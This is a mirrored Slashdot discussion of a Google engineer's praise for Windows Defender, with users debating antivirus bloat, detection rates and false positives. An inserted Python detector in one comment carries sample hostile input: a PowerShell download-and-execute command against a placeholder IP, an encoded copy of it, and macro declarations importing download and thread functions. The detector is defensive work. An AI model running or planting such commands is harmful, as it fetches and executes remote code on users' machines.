Slashdot Mirror


Google Chrome Engineer Says Windows Defender 'the Only Well Behaved Antivirus', Cites 'Tons of Empirical Data' (onmsft.com)

Days after former Firefox developer Robert O'Callahan said that antivirus security suites are not necessary and that AV vendors are of little help, a Google Chrome engineer has echoed the same message, reaffirming that Microsoft's built-in software is indeed the most well-behaved security suite. From a report: Apparently the disdain for third-party AV solutions runs deep amongst browser developers, as in response to the threads a Google engineer, Justin Schuh, had this to say: "Browser makers don't complain about Microsoft Defender because we have tons of empirical data showing that it's the only well behaved AV."

231 comments

  1. Bit Defender by Anonymous Coward · · Score: 0

    How well-behaved is Bit Defender?

    1. Re:Bit Defender by VanGarrett · · Score: 1

      When I tried out Bit Defender in 2014, it would fill up my RAM, and I'd have to reboot once a day. It's been some time now, since I've used it, and I don't know if they ever got around to fixing that or not.

    2. Re: Bit Defender by Anonymous Coward · · Score: 0

      I currently use it as "Corporate" AV, and every week we get at least one person with no network because of it.

    3. Re: Bit Defender by Anonymous Coward · · Score: 0

      About as well behaved as a rabid dog. It ignored the settings I put in to have it not automatically delete files it disliked. You can guess what happened, which is particularly bad since I knew that they were harmless.

      After the subscription ran out, it also wouldn't let me get files out of quarantine, and unless you have one of their corporate packages there appears to be no way to decrypt them readily. You have to send the (potentially private and sensitive) quarantine file to them and hope that they decrypt it right.

      It did some other hare-brained things, too, but I can't recall them right this minute. However, I can say that I am staying far away from their products, especially the free version - last I checked it had even fewer options to stop it from acting on its own than the commercial package. It seems to hate you if you do much at all that an advanced user might be interested in.

    4. Re:Bit Defender by FyRE666 · · Score: 1

      BitDefender on OSX is terrible. I wouldn't recommend it to anyone for any reason. It often thrashes the CPU, increasing heat and battery usage, and obviously has a massive impact on disk performance and overall system responsiveness. I've never used it on Windows, and likely never will. Windows Defender has always been fine for me on Windows. I've tried McAfee etc. in the past, and they've all been much more trouble than they're worth. I can't deal with the massive performance loss, and the strange abnormalities that often impede software testing brought about by AV software meddling in the filesystem and network layer.

      There's a reason so many otherwise useful programs try to smuggle AV onto your machine unless you happen to notice it, and opt out. It's because nobody would willingly subject themselves to that.

    5. Re:Bit Defender by JayHades · · Score: 1

      I use Bit Defender and it didn't react at all like what I could read here (i.e. RAM filled etc.). It's not taxing my computers like I've seen other packages do and it's not nagging me constantly. I think the heuristic scan graph should be evaluated, from https://chart.av-comparatives.... , NOT the file detection which relies on known patterns. Heuristics will be much more taxing for your CPU/RAM and also show the logic of an AV. (Windows) Defender is the base of comparison in this chart, just to show how low it is... Bit Defender is the big dog in this chart.

    6. Re:Bit Defender by Applehu+Akbar · · Score: 1

      On OS X, the built-in Xprotect is the only antivirus you need. Watch for 'social engineering' malware installs ("the email I clicked on looked just like it was from the bank, so I entered my machine password when it asked me to") and browser redirects.

  2. I'd agree by Anonymous Coward · · Score: 5, Insightful

    I tend to agree. I used to have third party anti-virus on the wife's machine and the kids' machine, but really the most effective malware prevention is to take away root/admin privileges altogether. Anti-virus doesn't protect against the stupidity of users. If they install malware, no anti-virus will stop them. Almost everything that the anti-virus software caught was benign and a false alarm. And despite being useless, the crap software was a resource hog.

    I have since uninstalled anti-virus. I will do an occasional malware bytes scan, but have done so less and less frequently as I find little but tracking cookies.

    So, yes, I agree with this report.

    1. Re: I'd agree by Anonymous Coward · · Score: 0

      Completely agree as well, but that's only because third party AVs are all shit.

      However on Windows Defender I would also agree that it's "well behaved" and conforms to the "first do no harm" mantra. However the reason is because it does fucking NOTHING.

      So by doing NOTHING, it's better than all other AVs. That's it.

    2. Re:I'd agree by RogueyWon · · Score: 4, Informative

      Same here, to be honest. AVG became unusable due to bloat a couple of years ago. Avast can have some serious issues when presented with a combination of Windows 10 with Anniversary Update and a Skylake CPU. The remainder all seem to be as bad as much of the malware they ostensibly protect you from.

      I confess I spent a while feeling paranoid after I finally gave in and uninstalled Avast, but a few months on, I've had no problems with a combination of Windows Defender and a weekly Malwarebytes scan.

    3. Re:I'd agree by Joce640k · · Score: 0

      AV software is 90% placebo. All virus writers test their wares against the major AV systems before they release them. Any virus you encounter in the wild is probably not going to trigger yours.

      I keep all my email viruses in a folder to see how long it takes AV software to catch up. It can take weeks. Sometimes they never do.

      Sandboxing and restricted permissions are the way to go (as you note).

      --
      No sig today...
    4. Re: I'd agree by TheRaven64 · · Score: 4, Interesting

      Doing nothing is an improvement over many third-party antivirus products. Remember the fun Norton bug last year, where they had a buffer overflow in their image parser that meant that someone sending you an email with an image attachment (even if you never opened the attachment) could run arbitrary code with kernel privilege? Quite why they thought that the part of their program that parses and inspects data that's expected to be malicious should run with kernel privilege instead of in a deprivileged sandbox was never revealed. I don't want to particularly pick on Norton here - most of the other vendors have had remotely exploitable vulnerabilities that leave you worse off than if you didn't bother with their products at all.

      Add to that, most antivirus products still use system-call interposition mechanisms that have been shown to be trivial to bypass for a decade (we used to set it as an exercise for undergrads).

      --
      I am TheRaven on Soylent News
    5. Re:I'd agree by xxxJonBoyxxx · · Score: 4, Funny

      >> I keep all my email viruses in a folder to see how long it takes AV software to catch up. It can take weeks. Sometimes they never do.

      I do this too. I also have a folder on Google Drive called "Viruses" for exactly the same purpose. It's been getting pretty full lately; I feel a little like Egon with his neighborhood-sized twinkie.

    6. Re:I'd agree by Anonymous Coward · · Score: 0

      Didn't AVG start tracking and selling user data recently?

      I had to get rid of Avast since it always pegged my CPU randomly and couldn't be stopped without restarting. No hard drive activity, just continuous 50-100% CPU usage.

    7. Re:I'd agree by David_Hart · · Score: 1

      >> Same here, to be honest. AVG became unusable due to bloat a couple of years ago. Avast can have some serious issues when presented with a combination of Windows 10 with Anniversary Update and a Skylake CPU. The remainder all seem to be as bad as much of the malware they ostensibly protect you from.

      >> I confess I spent a while feeling paranoid after I finally gave in and uninstalled Avast, but a few months on, I've had no problems with a combination of Windows Defender and a weekly Malwarebytes scan.

      I've had no problem with Avast, Win 10, and the i5 Skylake on my Surface Pro 4. Not saying that there isn't one, just that I haven't experienced it.

      My current security setup for all of my computers is Avast, Spybot S&D, and Spybot Anti-Beacon. The primary reason why I run Avast vs Defender is because Avast scans email on arrival and when sending and seems to have a bit more advanced protection. Defender only scans email when you open an attachment. One of these days, maybe my next computer, I'll drop Avast. But for now, this setup works for me.

    8. Re:I'd agree by Anonymous Coward · · Score: 0

      Malware Bytes is antimalware AND it's pretty damn well behaved in my experience - why is it getting counted out here?

    9. Re:I'd agree by Khyber · · Score: 2

      Fuck, I thought I was the only one doing this. I must have around 1GB of auto-generated or carefully-saved malware (and a few MS-DOS virii) in my GMail account.

      It just goes to show how stupid even those with "IT Expertise" can really be.

      --
      Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
    10. Re: I'd agree by Anonymous Coward · · Score: 0

      They're probably referring to the pay version that sticks around in memory if you let it. The free version is on-demand only. Different kettle of fish especially since it acts a lot more like a regular application and doesn't interact with other programs nearly as invasively as a real time scanner would.

    11. Re:I'd agree by MrL0G1C · · Score: 1

      >> If they install malware, no anti-virus will stop them.

      Start-ups should be ring-fenced tightly; if this is done, all it would take is a reboot to de-fang a virus.

      A program that doesn't start is harmless.

      --
      Waterfox - a Firefox fork with legacy extension support, security updates and better privacy by default.
    12. Re: I'd agree by Darinbob · · Score: 1

      My mother keeps getting viruses. She'll click on anything and everything as she has difficulty being paranoid online. Her antivirus DOES detect viruses.

      If it interferes with the operation of the browser then that's perfectly fine with me.

    13. Re:I'd agree by Darinbob · · Score: 1

      Except that I do see the 10% happening. Sure the smart viruses will get past it, but there are countless old viruses still making the rounds and my relatives keep finding them. You may as well say that locking the front door is 90% placebo, but you'd be pretty dumb to leave it unlocked all the time because there are attacks of opportunity.

    14. Re:I'd agree by Anonymous Coward · · Score: 0

      Many AV products scan things when they try to start running. They look for behaviors. A virus sitting in an email isn't a threat to anything and can't be identified from its behaviors because it isn't doing anything. I agree that most AV is crap, but your evaluation of AV software is just as bad. You only know enough to be dangerous, you don't know enough to understand what you're talking about, same with the other people replying to your post. Now if you trigger all those viruses on a daily basis then you might have a cause, but your computer would probably be so infected that one of the infections silently nurtured your anti-virus software.

      As to the GP who thinks limited rights will save them, he's also wrong (unless you've blacklisted everything not on a whitelist, but you didn't claim that). The OS is the only thing that's protected by limiting root access, and yet the OS is the easiest thing to restore. You don't need to protect the OS. The user data is the most important thing, and any malware the user can trigger can wipe out their data or whatever they do. No root rights required. Removing root rights provides no protection for anything important on home computers (servers are a different story).

      Individual, disconnected backups are your best protection from malware. You should never have all of your backups connected to the same computer at the same time. Ransomware could spread from the PC and encrypt all the backups. Move backups to write-once media only. Too much data? Then the fallout of losing it all is even greater.

    15. Re: I'd agree by Anonymous Coward · · Score: 0

      My Mom wants a new laptop because the one she's got is full of viruses. I told her she'll just do that to whatever computer she uses. She says "yeah but a new one would be faster!"
      Okay Mom. Sure it will. For a day.

      For the record we both use Avast so I really don't understand how she does it. It keeps my computer clean. I guess the real difference is I don't go to FB so I don't get hit with the latest and greatest malware.

    16. Re: I'd agree by ArmoredDragon · · Score: 1

      Now if only Windows Defender would stop flagging useful tools like KMSpico and Daz's loader as malware.

    17. Re:I'd agree by Anonymous Coward · · Score: 0

      Totally agree, user education is by far the best defence.

    18. Re: I'd agree by Anonymous Coward · · Score: 0

      Avast bought AVG a couple months ago so, yeah.

    19. Re: I'd agree by sevenisloud · · Score: 1

      I stopped using AVG a few years ago (3 or 4 maybe?) when they started popping up notifications in the system tray that encouraged you to secure your browser. I accidentally clicked OK once and had my homepage and search changed to AVG safe search (in Firefox, IE and Chrome - it was very thorough). I uninstalled immediately and have found Microsoft's offering to be perfectly fine ever since.

    20. Re:I'd agree by david_thornley · · Score: 1

      It doesn't seem to work very well. We've been trying it for years.

      --
      "When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
    21. Re:I'd agree by david_thornley · · Score: 1

      Commercial anti-virus software won't protect you well from anything new, as you point out, but modern AV can recognize actions typical of malware, and their recognition databases get updated so last quarter's popular new virus will probably just be blocked today.

      One problem with sandboxing and restricted permissions is that the user data is usually what's important. I can blow away and restore operating systems without a qualm, but I'd really miss my home directory stuff if it went. (That's why it's backed up, of course.)

      --
      "When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
  3. Wish they hadn't said that. by Anonymous Coward · · Score: 1

    Now Microsoft will promptly fuck up Defender.

  4. I don't know about that by Anonymous Coward · · Score: 5, Funny

    I have a friend who's a Windows Defender and he just goes on and on about how great Microsoft's products are. Pretty intrusive if you ask me.

  5. Disable ad-blocker for a paragraph of twitter crap by bignetbuy · · Score: 5, Informative

    I clicked on the link, got a popup asking me to disable my ad-blocker... fine. Done. Turns out the article is about a paragraph and just regurgitates some twitter garbage. Utterly useless site.

  6. Bullshit by Anonymous Coward · · Score: 0

    I ran a Windows 7 system, nothing weird, just normal use: YouTube, office work, some games (no bootleg), with just Windows Defender.
    I uninstalled AVG (I know, I know) and used the system for less than a month and noticed odd issues, so I decided to reinstall AVG and scan the system, and it found several instances of different types of malware. Windows Defender not only did not protect me but failed to detect the malware when scanning the system.
    AVG picked them right up and quarantined them. Later on I did similar experiments with Avira and other AV, and Windows Defender failed on other systems I have but the commonly used AV software worked fine.

    1. Re:Bullshit by jaklode · · Score: 1

      With normal use you would not find "several instances of different types of malware" in the first place...

    2. Re:Bullshit by Anonymous Coward · · Score: 0

      AVG found *something*. Do you *really* know if it was a correctly found threat or just a false positive? (Perhaps deliberately so you now "know" that AVG is better than Defender?)

    3. Re: Bullshit by Anonymous Coward · · Score: 0

      Go to the deepest pit of fire in hell and burn fucking AVG shill

  7. AV Browser Addons by Anonymous Coward · · Score: 1

    Antivirus nowadays always tries to install some sort of browser addon/plugin.

  8. Re:MicroShaft by Anonymous Coward · · Score: 1

    What's this? Russian troll army prefers that all Americans use Kaspersky?

  9. Conflict of interest by sjbe · · Score: 5, Insightful

    The problem is that every company other than Microsoft has a built-in conflict of interest. The AV software companies' profit motives are not aligned with providing a good user experience. A good anti-virus system should be nearly invisible. It is hard to convince customers to pony up a lot of money for security software unless you are always in their face, and an anti-malware system that does this inherently results in a bad product. Worse, they have to keep tacking on extra "features" and products to convince customers their product is better than the next guy's. Their business model is based on scaring customers so they buy their product based on perceptions rather than actually keeping them safe.

    1. Re:Conflict of interest by Big+Hairy+Ian · · Score: 0

      --
      Build a Man a Fire, and He'll Be Warm for a Day. Set a Man on Fire, and He'll Be Warm for the Rest of His Life.

    2. Re:Conflict of interest by AmiMoJo · · Score: 2

      Symantec tried this about a decade ago. I think it was around 2007 they released a version of Norton Anti-Virus and Internet Security that actually didn't suck too much. It didn't grind the computer to a halt, it didn't nag constantly, it just quietly got on with its job. In one version they went from joint last with McAfee to being one of the best.

      It must not have worked very well for them because the next year it started to pop up little messages again telling you that it has protected you from 9.8 billion tracking cookies. By about 2010 it was total crapware again.

      I guess they found that if they don't constantly remind the customer that their software is saving them from the certain doom of having a cookie placed on their machine they might not renew it.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    3. Re:Conflict of interest by John.Banister · · Score: 1

      Avast (Premier) doesn't bug me, except to try and sell their VPN when I bring up porn sites.

    4. Re:Conflict of interest by Solandri · · Score: 1

      That's pretty much why I've stopped using 3rd party anti-virus, and just rely on Windows Defender. Dealing with all the unwanted and intrusive "features" and bugs in 3rd party anti-virus got to be more of a chore than dealing with actual viruses. When it's less annoying to deal with a virus infection after the fact than it is to live with your anti-virus every day, that's a pretty good sign you're doing something wrong.

      Malwarebytes still gets my thumbs up though. Clean, simple, and effective.

    5. Re:Conflict of interest by mykepredko · · Score: 1

      Excellent comment and I only wish other Microsoft products weren't so well behaved.

      You know,
      - Being asked to upgrade for "free" to an OS that routinely monitors your actions.
      - Then being asked to upgrade to the "Pro" package.
      - Getting asked to buy the latest versions of Office.

    6. Re:Conflict of interest by Anonymous Coward · · Score: 0

      Is this an issue with 'Consumer' grade versions of AV software only, or do corporate/business versions suffer from it as well? Has the quality for detection routines similarly suffered on the 'Business' side right along the 'Consumer' side, or do they have separate engines (constructs? architectures? not even sure of the term) that make one a higher quality product over the other. The one at my office seems to have an incredibly stripped down UI, but I can't really vouch for how good of an actual job it does... I don't suppose anyone has metrics or empirical data with respect to this.

    7. Re:Conflict of interest by indi0144 · · Score: 2

      You consider this acceptable? That the AV tracks into the "semantics" of your browser content in order to offer you a VPN? Were Chrome to do the same, the privacytards would flip.

      I use NOD AV and the only times I get bugged is when it blocks some bad resource, like a favicon or a bad ad. It does not yell when it updates, it does not nag you with new versions. Set and forget, and it's been like this for more than 10 years.

    8. Re:Conflict of interest by John.Banister · · Score: 1

      I expect that it looks at everything coming in from outside the computer well enough to prevent anything malicious from getting in. Recognizing that incoming content originates from a popular porn provider seems pretty trivial by comparison. I only see the "Anyone can see where you're browsing" notices about once a week or so. It's not enough of an annoyance for me to feel strongly about it.

    9. Re:Conflict of interest by indi0144 · · Score: 1

      Yeah I get it, I have script blockers in all browsers but the AV catches everything before the browser gets a single bit. If I were to search "Nod AV keys" "Crack nod32" the AV will bitch. I'm aware of the AV having to know the content you're browsing, but from that to offer ads based on this data, and in a paid version nonetheless, nope.

  10. Least effective too by Somebody+Is+Using+My · · Score: 2, Insightful

    It's probably the "best-behaved" because it is one of the least effective anti-virus. It has terrible detection rates compared to its competitors. The other anti-virus programs may be pushier and embed themselves deeper into the host system, but that's necessary in order for them to (try to) root out the infections.

    Arguably end-users do not need this sort of protection offered by better AV packages, and Microsoft's product is "good enough" for most users. Certainly, better antivirus is no panacea; even the best scanner can still miss some viruses. Personally - having cleaned out too many virus-infected machines - I'd rather the end-user have the maximum available protection if only to slow down the infection rate a little, although that still doesn't help when the end-user deactivates the AV, never updates it or just flat-out ignores its warnings. But regardless of your opinion of the /necessity/ of the software, you can't simply judge Microsoft's offering without taking into consideration its effectiveness. It is "best behaved" (for whatever that means) because it simply /does less/.

    1. Re:Least effective too by Anonymous Coward · · Score: 4, Informative

      https://chart.av-comparatives.org/chart1.php
      Just to summarize with a few popular AVs:
      Microsoft: 97% detection rate, 23 false positives
      McAfee: 97.9% detection rate, 57 false positives
      Kaspersky: 99.8% detection rate, 1 false positive
      Avast: 99.6% detection rate, 13 false positives
      F-Secure: 99.9% detection rate, 140 false positives
      Doesn't look like MS is particularly bad.

    2. Re:Least effective too by Anonymous Coward · · Score: 0

      Is it time to play "spot the shill" already?

      There are numerous comparisons of A/V software that rate MS Defender right in the middle of the pack with other A/V products, and a few that rate it higher or lower.

      Anyone trying to throw shade on Defender probably has an agenda, or is at least ignoring or denying most of the available evidence.

    3. Re:Least effective too by Anonymous Coward · · Score: 0

      You actually don't know what you are talking about. You should read the response from Rob Koch at the link below which includes links to real world information and explains why Windows Defender is actually the best anti-virus solution for every Windows computer:

      https://answers.microsoft.com/...

    4. Re:Least effective too by Anonymous Coward · · Score: 1

      You look at it from the wrong end: a 3% leak is a lot more than the 2.1% leak that McAfee has, and way worse than the others.

      Even more interesting is the percentage of new threats that's leaking through the gates of the anti-virus software packages. That's what really matters these days.

    5. Re:Least effective too by omfglearntoplay · · Score: 2

      These charts have to be misleading. I'd stake my life that they take 10,000 old known malwares and test against them. Not surprisingly, every vendor detects them. Then they take a dozen or so new malwares, and 2 vendors catch them. Eventually you have the 99.1% vs. 98.9% type results and they all look about equal. They are certainly not equal.

      All it takes is one of those new malware threats to bring down your business for a day. If you want a chance at catching them, you go with vendors that do a good job at the new stuff. In my experience, the free MS stuff doesn't ever catch the new stuff. Ever.

    6. Re:Least effective too by Anonymous Coward · · Score: 0

      I like how you ignored the false positives.

    7. Re:Least effective too by Anonymous Coward · · Score: 0

      Also, it is Google. They probably find it easiest to mine/capture your data when you use Defender.

    8. Re:Least effective too by AmiMoJo · · Score: 1

      Windows Defender isn't going to save you if you are the kind of idiot who downloads random crapware. What it will save you from is a variety of exploits and other attempts to screw with your system. File based detection is a losing battle, virus writers are constantly testing their software with the latest definitions and making sure it passes by, and AV software is getting multiple updates a day to try to keep up.

      Google and Mozilla have the right idea. Defence in depth. If you rely on just detecting bad files, you are screwed. If your AV software installs a plug-in that makes your browser less secure so that it can scan a few files and delete the odd cookie, you are screwed.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    9. Re:Least effective too by chispito · · Score: 1

      >> a 3% leak is a lot more than the 2.1%

      That depends entirely on what kinds of things are in the 3% and the 2.1%, as well as how often they are seen in real world usage.

      --
      The Daddy casts sleep on the Baby. The Baby resists!
    10. Re:Least effective too by chispito · · Score: 2

      >> It's probably the "best-behaved" because it is one of the least effective anti-virus.

      It works well for the kinds of people that are not engaged in risky computing in the first place. The other kind are not going to be saved by any kind of AV, but are probably a great source of income for you as a support tech.

      >> It is "best behaved" (for whatever that means) because it simply /does less/.

      If by "does less," you mean it is not hyperactive and so does not train your users to ignore its alerts then, yes, you are correct. It does less.

      --
      The Daddy casts sleep on the Baby. The Baby resists!
    11. Re:Least effective too by Parker+Lewis · · Score: 1

      You're covering just one side of the problem (virus detection). Let's ignore that Windows Defender is really effective (it's close to the paid alternatives). The other side is about not raising so many false positives. Most paid AVs raise so many false alarms that the average Joe will tend to ignore the alerts or just uninstall the AV altogether. Windows Defender, at the end of the day, works because it has a good compromise of detection and low false alarms.

    12. Re:Least effective too by thegarbz · · Score: 1

      >> It's probably the "best-behaved" because it is one of the least effective anti-virus. It has terrible detection rates compared to its competitors. The other anti-virus programs may be pushier and embed themselves deeper into the host system, but that's necessary in order for them to (try to) root out the infections.

      Half the time the level of embedding IS the infection. I've never had Windows Defender cause an issue with the Offline Files service by locking the temporary files that Office creates when you hit save, resulting in the temporary files staying on the disk and the correct files going missing. I have with McAfee. You don't get remote code exploits on Windows Defender just by sending someone an email or a RAR file, unlike with Norton.

      Nothing is quite as attractive as a program that runs with system privileges, behaves like a rootkit, and is full of bugs, like most of the AV software out there.

    13. Re:Least effective too by Anonymous Coward · · Score: 0

      Sigh. I still remember times when a non-crafted false positive meant that the antivirus was broken. Those times have long gone. Now if an antivirus thinks your program does something abnormal you better alter the code until it passes or be a megacorp so that you get whitelisted. Less is sometimes more when the whole concept is flawed.

      Frankly, people who get their computers constantly infected should be sandboxed themselves. Let them use closed-ecosystem devices or disconnect their computers from the net. Otherwise they are a danger to computing even if their computers had a dozen layers of antiviruses fighting against each other.

    14. Re:Least effective too by roca · · Score: 0

      I wrote about this in a followup: http://robert.ocallahan.org/20...

      The problem is that, by design, AV software is ineffective at catching "new stuff", partly because malware authors can tweak new malware until it passes the classifiers of the major AV products.

      So the reality is that every day new malware appears that will not be caught by even the best AV packages unless you're lucky. Real life detection rates will be significantly lower than seen in these tests. Even if the difference between Windows Defender and the others grows a bit, it may actually be less significant.

      "A chance at catching them" isn't good enough. What you need are the systematic security measures deployed by modern OSes and browsers, more and better. And AV software gets in the way of that.

    15. Re:Least effective too by Darinbob · · Score: 1

      A false positive is not a bad thing. The complaint in the article is not that the antivirus is not effective, but that it "interferes" with some applications. Which does not sound like a problem to me, just a bit more work for the developers.

    16. Re:Least effective too by Anonymous Coward · · Score: 0

      What we need is a system where the complete set of sources are available for all applications so that the bugs can actually be fixed such that no malware can exploit the system in the first place and if a bug is exploited then it can be patched quickly such that no further malware can exploit it. With anti-virus software it doesn't matter how much it detects because it can't ever stop the stream of new malware from coming through.

      Ohh- that's right- there is this thing called GNU/Linux. Stupid will be stupid. Excuses for not using it are mostly the result of incompetent people, including the majority of "technical" people. Installing GNU/Linux on hardware where we don't have the complete set of sources and the devices can't be properly supported is almost always going to end in a bad user experience. There is a solution- buy free-software-supported hardware and the problem goes away, and 50% of the users are better suited by GNU/Linux than any other OS. And that's not that hard: http://www.thinkpenguin.com/ only sells such hardware and they've got all the common components, accessories, and computers which can be properly supported. They are the Newegg / Apple of the GNU/Linux world.

    17. Re:Least effective too by Anonymous Coward · · Score: 0

      Evidence for these claims?

    18. Re:Least effective too by a_n_d_e_r_s · · Score: 1

      It's all about how many viruses are let through.

      Microsoft being 3000% worse than F-Secure is not bad?

      --
      Just saying it like it are.
    19. Re:Least effective too by Anonymous Coward · · Score: 0

      I take it miscarriage of justice is not a bad thing either then? Are we supposed to trust a virus scanner or is it just another weather report?

      "Interference" not a bad thing either? Just a bit of more work? You think everything can be magically fixed by adding more "work" to it? You don't mind about the difference between well-engineered software that actually works reliably vs a pile of accumulated hacks to survive in real world equivalent of core wars?

    20. Re:Least effective too by Anonymous Coward · · Score: 0

      You can't just flip metrics like that and make a meaningful comparison when the other end is inexact. If n% of malware isn't even counted (maybe because it's unknown or evades classification), then the relevant numbers aren't 3% vs 2.1% but roughly (n+3)% vs (n+2.1)%.

    21. Re:Least effective too by Anonymous Coward · · Score: 0

      Blah blah. If every modification was a guaranteed step in a positive direction, Linux would probably be the most secure system in existence. Unfortunately, software can also get worse.

    22. Re:Least effective too by david_thornley · · Score: 1

      Note that "risky computing" includes going to reputable websites without an ad blocker, and downloading third-party software from a site you haven't carefully vetted. Sigh.

      --
      "When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
  11. Re:Disable ad-blocker for a paragraph of twitter c by AmiMoJo · · Score: 4, Insightful

    These engineers forgot the most effective, powerful anti-virus product that is an absolutely essential install; the ad blocker.

    --
    const int one = 65536; (Silvermoon, Texture.cs)
    SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
  12. As a security guy, I mostly agree... by xxxJonBoyxxx · · Score: 4, Interesting

    All the AVs today pretty much catch the same low-hanging fruit, and there's no good reason to buy a third-party bolt-on anymore.

    That said, I'm getting annoyed with AV packages still not being able to flag things like base-64-encoded Powershell scripts or Office doc VBS scripts that make direct references to system libraries. Almost all the malware that's made it through our defenses in the past six months has used one of these two techniques (plus a little code obfuscation, but still), and none of the AV packages I've tested (via sites that scan against dozens of packages) have ever flagged any of the most effective offenders.
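Added example (not code from the post above or from any other poster): a small Python detector for the two techniques xxxJonBoyxxx describes. It decodes the UTF-16LE base64 that powershell.exe takes after -EncodedCommand (and its short forms), looks for the usual loader tells in the decoded text, and pulls Declare statements out of VBA source that import directly from system DLLs. The process events, the script and the macro are constructed for illustration; the indicator list and the DLL set are my own choices, not any vendor's signatures.

```python
"""Spot the two delivery techniques the post complains about: base64-encoded
PowerShell command lines and Office VBA that imports Win32 APIs directly.
Added example for this thread, not code from any poster; the process events
and macro source below are constructed."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc...).
# The argument is base64 of the script text encoded as UTF-16LE.
_ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")

# Script-level tells that usually travel with an encoded loader (my own list).
_PS_INDICATORS = {
    "invoke-expression": re.compile(r"(?i)\biex\b|invoke-expression"),
    "web-download": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    "nested-base64": re.compile(r"(?i)frombase64string"),
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
}

# DLLs a spreadsheet macro has little legitimate reason to Declare against (assumed set).
_SYSTEM_LIBS = {"kernel32", "ntdll", "user32", "urlmon", "wininet", "shell32", "advapi32"}
_VBA_DECLARE = re.compile(
    r'(?im)^\s*(?:private\s+|public\s+)?declare\s+(?:ptrsafe\s+)?'
    r'(?:function|sub)\s+(\w+)\s+lib\s+"([^"]+)"'
)


def decode_encoded_command(blob):
    """Return the script text inside an -EncodedCommand blob, or None if it is not one."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None
    # Real script text is printable; arbitrary bytes that happen to decode are not.
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    if not text or printable < 0.95 * len(text):
        return None
    return text


def scan_command_line(cmd):
    """Classify one process command line: was it encoded, what did it say, which tells fired."""
    result = {"encoded": False, "decoded": None, "indicators": []}
    m = _ENC_FLAG.search(cmd)
    if m:
        text = decode_encoded_command(m.group(1))
        if text is not None:
            result["encoded"], result["decoded"] = True, text
    # Look in both the raw command line (e.g. -W Hidden) and the decoded script.
    haystacks = [cmd] + ([result["decoded"]] if result["decoded"] else [])
    result["indicators"] = [name for name, rx in _PS_INDICATORS.items()
                            if any(rx.search(h) for h in haystacks)]
    return result


def scan_vba(source):
    """Return (procedure, library) pairs for Declare statements importing system DLLs."""
    hits = []
    for proc, lib in _VBA_DECLARE.findall(source):
        base = lib.lower().rsplit("\\", 1)[-1]   # strip any path component
        if base.endswith(".dll"):
            base = base[:-4]
        if base in _SYSTEM_LIBS:
            hits.append((proc, base))
    return hits


def flagged_events(events):
    """Return [(pid, result)] for process events that were encoded or tripped an indicator."""
    out = []
    for pid, cmd in events:
        r = scan_command_line(cmd)
        if r["encoded"] or r["indicators"]:
            out.append((pid, r))
    return out


# Constructed sample data (not real telemetry).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
SAMPLE_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [  # (pid, command line)
    (4120, "powershell.exe -NoP -W Hidden -Enc " + SAMPLE_BLOB),
    (4133, "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
    (4150, "powershell.exe -enc not_base64_at_all!!"),
]
SAMPLE_VBA = r'''
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal a As LongPtr) As LongPtr
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal u As String) As Long
Private Declare Function GetTickCount Lib "kernel32.dll" () As Long
Public Declare Function VendorHelper Lib "C:\Apps\vendor.dll" () As Long
Sub Workbook_Open()
    Call Payload
End Sub
'''

if __name__ == "__main__":
    for pid, r in flagged_events(SAMPLE_EVENTS):
        print(pid, "encoded" if r["encoded"] else "plain", r["indicators"], r["decoded"])
    print(scan_vba(SAMPLE_VBA))
```

The decode step is what separates this from a string match on "-enc": the blob is validated as base64, decoded as UTF-16LE, and rejected if it is not mostly printable, so a random argument that happens to look like base64 does not fire. The VBA side deliberately ignores the Declare's own name and keys on the library, since the import target is the thing a macro author cannot easily obfuscate.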

    1. Re:As a security guy, I mostly agree... by Anonymous Coward · · Score: 0

      All the AVs today pretty much catch the same low-hanging fruit, and there's no good reason to buy a third-party bolt-on anymore.

      from the last article in the Google Hates AV cycle:

      It's like we are standing around the dead canary saying 'Thank god it inhaled all the poisonous gas'. -- Darren Bilby

      bravo, guys. Where have you been all this time? glad you're finally here, though.

    2. Re:As a security guy, I mostly agree... by Anonymous Coward · · Score: 0

      base-64-encoded Powershell scripts

      Do you mean encoded scripts or things like encoded binaries in the scripts? Or the obvious encoded scripts with encoded binaries? :)

  13. I tend to agree as well. by wierd_w · · Score: 5, Interesting

    Far too often, antivirus products follow the "cable television" market strategy:

    "Yes, we know you already pay us for a subscription, but we can get so much more out of you by forcing you to see all kinds of shit you really don't want, including adverts for all our other services."

    And, in the case of free antivirus, this too:

    "We can see that you really don't want our full package, otherwise you would have bought it instead of opting for the free version-- but we feel compelled to try to upsell you each and every possible opportunity, and won't relent at all. We will even be really obnoxious with your notification area, and make your system play audio adverts, because that's how much we really want you to have a subscription (but see the prior market strategy-- we won't let up on the ads even if you do!)"

    They invest tons of resources (both computational and time-wise) into making needlessly flashy UIs with big colorful buttons, and scary "CSI: Miami"-esque dialogs, when really--- the part that really matters-- how well they can trap execution events without bogging the system down-- seems to get nearly no love, and appears to get shittier and shittier.

